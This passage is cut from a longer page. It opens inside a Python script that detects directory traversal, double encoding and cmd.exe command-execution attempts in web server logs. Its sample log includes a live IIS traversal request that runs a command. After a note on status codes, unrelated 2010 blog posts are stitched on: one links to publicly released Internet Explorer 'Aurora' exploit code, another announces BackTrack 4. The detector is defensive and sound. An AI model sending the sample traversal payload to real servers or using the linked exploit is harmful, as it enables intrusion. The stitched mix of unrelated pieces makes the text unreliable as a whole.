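10.0.0.5 - - [08/Mar/2010:10:00:04 +0000] "GET /robots.txt HTTP/1.0" 200 30
10.0.0.5 - - [08/Mar/2010:10:00:05 +0000] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def full_decode(s, max_rounds=5):
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
        rounds += 1
    return s, rounds


def classify(path):
    """Tags for one request path; an empty list means nothing suspicious."""
    decoded, rounds = full_decode(path)
    norm = decoded.replace("\\", "/").lower()   # IIS accepts either separator
    resource = norm.split("?", 1)[0]
    tags = []
    if rounds >= 2:
        tags.append("double-encoding")          # %255c needed two decode passes
    if "../" in norm:
        tags.append("traversal")
    if "cmd.exe" in norm:
        tags.append("command-execution")
    if resource.endswith("/.htaccess"):
        tags.append("htaccess-access")
    if resource.endswith("/robots.txt"):
        tags.append("robots-access")
    return tags


def analyze(log_text):
    """Return one alert dict per suspicious line, keeping the status code so
    the reviewer can see whether the server actually served the request."""
    alerts = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        tags = classify(match["path"])
        if tags:
            alerts.append({"ip": match["ip"], "path": match["path"],
                           "status": int(match["status"]), "tags": tags})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The status code matters: a traversal request answered with 200, as in the second sample line, means the server ran the command, while a 404 means the patch or URL canonicalisation held. The decoder stops after a fixed number of rounds so a deliberately deep encoding cannot keep it looping.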
Tuesday, January 19, 2010
IE Aurora
Internet Explorer "Aurora" Exploit Code released to the public.
Check here:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
Monday, January 18, 2010
Thursday, January 14, 2010
BackTrack 4 is Here!!!
Guys,
The long awaited BackTrack 4 (Security Live CD Distro) is finally here.
You can download the ISO file or the VMware version here:
http://www.backtrack-linux.org/downloads/
I have tested it and it works great. I even tried to update it with the latest Metasploit Framework 3.3.4 and it's up and running smoothly.
Let's share some information on this distro, since I'm one of its fans.
For those security freaks in Indonesia, you can join IndoBackTrack; here is the link:
http://indobacktrack.or.id/
There you can also find some alternative download links for BackTrack 4 Final Release.
Enjoy...